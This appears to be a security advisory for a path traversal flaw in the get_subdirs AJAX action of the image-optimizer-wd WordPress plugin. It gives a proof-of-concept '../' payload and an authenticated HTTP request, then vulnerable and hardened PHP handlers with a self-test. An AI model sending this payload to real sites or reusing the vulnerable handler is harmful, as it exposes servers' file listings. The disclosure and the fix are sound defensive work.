The plugin does not sanitize the `dir` parameter of the `get_subdirs` AJAX action (handled via `admin-ajax.php`). A high-privilege user such as an administrator can therefore supply `../` sequences in `dir` and list the names of files and directories outside the site's web root (path traversal).
Proof of concept:

- Payload: `../../../../../../../../../../../../../../../../../../../` (`../` repeated 19 times, which matches the `Content-Length: 102` of the request below)
- Steps: on the plugin settings page (`admin.php?page=iowd_settings`), use the "Other directory" function and select a directory, then replace the `dir` parameter of the resulting `get_subdirs` request with the payload.
- Request (sent as an Admin+ user; the nonce value is redacted as `xxxxxxxxxx`):

```http
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Referer: http://localhost/wordpress/wp-admin/admin.php?page=iowd_settings
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 102
Cookie: [Admin+]

action=get_subdirs&nonce_iowd=xxxxxxxxxx&dir=../../../../../../../../../../../../../../../../../../../
```
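To show where a traversal like this comes from and how it is closed, here is an added illustration in PHP. It is not the plugin's code (the real handler is not on this page): the function names, the nonce action string `iowd_settings`, the `manage_options` capability and the constructed directory tree in the self-test are assumptions; only the request parameters (`action=get_subdirs`, `nonce_iowd`, `dir`) follow the request above.

```php
<?php
// Added illustration for this advisory; NOT the plugin's code. Handler names,
// the nonce action and the capability are assumptions; the parameters
// (action=get_subdirs, nonce_iowd, dir) follow the advisory's request.

/**
 * Resolve $base/$dir and return the canonical path only if it stays inside
 * $base. Returns null for a missing directory or a traversal out of $base.
 * Pure PHP, so it can be exercised outside WordPress (see self-test below).
 */
function iowd_resolve_subdir( string $base, string $dir ): ?string {
    $real_base = realpath( $base );
    $real      = realpath( $base . DIRECTORY_SEPARATOR . $dir );
    if ( false === $real_base || false === $real || ! is_dir( $real ) ) {
        return null; // non-existent target, or base itself is missing
    }
    // Allow the base itself (dir is "" or ".") or any path strictly below it.
    if ( $real === $real_base
        || 0 === strpos( $real, $real_base . DIRECTORY_SEPARATOR ) ) {
        return $real;
    }
    return null; // e.g. "../" x 19 resolved to "/" or another outside directory
}

/** List immediate sub-directory names of an already-validated path. */
function iowd_list_subdirs( string $path ): array {
    $out = array();
    foreach ( scandir( $path ) as $entry ) {
        if ( '.' !== $entry && '..' !== $entry
            && is_dir( $path . DIRECTORY_SEPARATOR . $entry ) ) {
            $out[] = $entry;
        }
    }
    return $out;
}

// Vulnerable shape: the nonce is verified, but "dir" is appended to the
// uploads base and scanned as-is, so "../" segments walk out of it.
function iowd_get_subdirs_vulnerable() {
    check_ajax_referer( 'iowd_settings', 'nonce_iowd' ); // action name assumed
    $base = wp_upload_dir()['basedir'];
    $dir  = isset( $_POST['dir'] ) ? wp_unslash( $_POST['dir'] ) : '';
    wp_send_json_success( iowd_list_subdirs( $base . '/' . $dir ) );
}

// Hardened shape: capability check plus canonicalisation and containment check.
function iowd_get_subdirs_hardened() {
    check_ajax_referer( 'iowd_settings', 'nonce_iowd' );
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 ); // wp_die()s after sending
    }
    $base = wp_upload_dir()['basedir'];
    $dir  = isset( $_POST['dir'] ) ? wp_unslash( $_POST['dir'] ) : '';
    $path = iowd_resolve_subdir( $base, $dir );
    if ( null === $path ) {
        wp_send_json_error( 'invalid directory', 400 );
    }
    wp_send_json_success( iowd_list_subdirs( $path ) );
}

// Self-test, runnable with plain `php this_file.php` (no WordPress needed):
// builds a constructed uploads tree in the temp dir and exercises the guard.
if ( PHP_SAPI === 'cli' && ! function_exists( 'add_action' ) ) {
    $tmp = sys_get_temp_dir() . '/iowd_demo_' . getmypid();
    mkdir( "$tmp/uploads/2024/01", 0700, true );
    mkdir( "$tmp/secret", 0700, true );
    var_dump( iowd_resolve_subdir( "$tmp/uploads", '2024' ) );          // inside: path returned
    var_dump( iowd_resolve_subdir( "$tmp/uploads", '2024/../2024' ) );  // still inside: allowed
    var_dump( iowd_resolve_subdir( "$tmp/uploads", '../secret' ) );     // NULL: traversal blocked
    var_dump( iowd_resolve_subdir( "$tmp/uploads", str_repeat( '../', 19 ) ) ); // NULL
    rmdir( "$tmp/uploads/2024/01" );
    rmdir( "$tmp/uploads/2024" );
    rmdir( "$tmp/uploads" );
    rmdir( "$tmp/secret" );
    rmdir( $tmp );
}
```

The nonce check present in both versions is what the `nonce_iowd` parameter of the PoC satisfies; it shows the request originated from the admin page and says nothing about the path. The actual fix is the containment check in `iowd_resolve_subdir`: `realpath()` collapses `../` segments and symlinks so the result can be compared against the canonical base directory, and `../` repeated 19 times simply resolves to `/` and is rejected. Because `realpath()` returns `false` for paths that do not exist, a traversal to a non-existent target is rejected as well rather than producing a PHP warning from `scandir()`.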
CPE

| Name | Operator | Version |
|---|---|---|
| image-optimizer-wd | lt | 1.0.27 |